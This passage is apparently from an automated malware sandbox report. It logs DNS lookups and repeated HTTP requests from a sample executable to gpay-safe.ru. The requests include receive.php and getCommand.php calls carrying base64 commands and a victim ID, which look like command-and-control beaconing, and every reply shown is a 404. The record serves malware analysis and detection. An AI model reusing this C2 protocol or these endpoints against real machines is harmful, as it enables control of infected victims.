                                          Aug 25, 2021 00:49:29.496506929 CEST192.168.2.48.8.8.80xa28cStandard query (0)gpay-safe.ruA (IP address)IN (0x0001)
                                          Aug 25, 2021 00:49:33.990952015 CEST192.168.2.48.8.8.80x1cbdStandard query (0)gpay-safe.ruA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Aug 25, 2021 00:49:10.351469040 CEST8.8.8.8192.168.2.40xf789No error (0)gpay-safe.ru91.206.93.216A (IP address)IN (0x0001)
                                          Aug 25, 2021 00:49:15.195938110 CEST8.8.8.8192.168.2.40x9d4No error (0)gpay-safe.ru91.206.93.216A (IP address)IN (0x0001)
                                          Aug 25, 2021 00:49:25.141108036 CEST8.8.8.8192.168.2.40x4bcaNo error (0)gpay-safe.ru91.206.93.216A (IP address)IN (0x0001)
                                          Aug 25, 2021 00:49:29.531724930 CEST8.8.8.8192.168.2.40xa28cNo error (0)gpay-safe.ru91.206.93.216A (IP address)IN (0x0001)
                                          Aug 25, 2021 00:49:34.023390055 CEST8.8.8.8192.168.2.40x1cbdNo error (0)gpay-safe.ru91.206.93.216A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • gpay-safe.ru

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.44972491.206.93.21680C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 25, 2021 00:49:10.466486931 CEST1131OUTGET /x/ HTTP/1.1
                                          Host: gpay-safe.ru
                                          Connection: Keep-Alive
                                          Aug 25, 2021 00:49:10.563898087 CEST1131INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:10 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:10.577456951 CEST1132OUTGET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:10.675556898 CEST1132INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:10 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:12.321815968 CEST1132OUTGET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:12.420679092 CEST1133INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:12 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.44972591.206.93.21680C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 25, 2021 00:49:15.306813002 CEST1227OUTGET /x/ HTTP/1.1
                                          Host: gpay-safe.ru
                                          Connection: Keep-Alive
                                          Aug 25, 2021 00:49:15.397839069 CEST1227INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:15 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:15.404287100 CEST1228OUTGET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:15.495248079 CEST1228INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:15 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:16.258338928 CEST1228OUTGET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:16.348107100 CEST1229INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:16 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:16.366950989 CEST1229OUTGET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:16.456933975 CEST1230INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:16 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.44972691.206.93.21680C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 25, 2021 00:49:25.262612104 CEST1317OUTGET /x/ HTTP/1.1
                                          Host: gpay-safe.ru
                                          Connection: Keep-Alive
                                          Aug 25, 2021 00:49:25.366013050 CEST1317INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:25 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:25.372049093 CEST1317OUTGET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:25.474937916 CEST1318INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:25 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:27.169502974 CEST1318OUTGET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:27.271891117 CEST1319INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:27 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.44972791.206.93.21680C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 25, 2021 00:49:29.646075964 CEST1319OUTGET /x/ HTTP/1.1
                                          Host: gpay-safe.ru
                                          Connection: Keep-Alive
                                          Aug 25, 2021 00:49:29.747039080 CEST1320INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:29 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:29.754647970 CEST1320OUTGET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:29.854893923 CEST1321INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:29 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:30.652084112 CEST1332OUTGET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:30.754179001 CEST1332INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:30 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
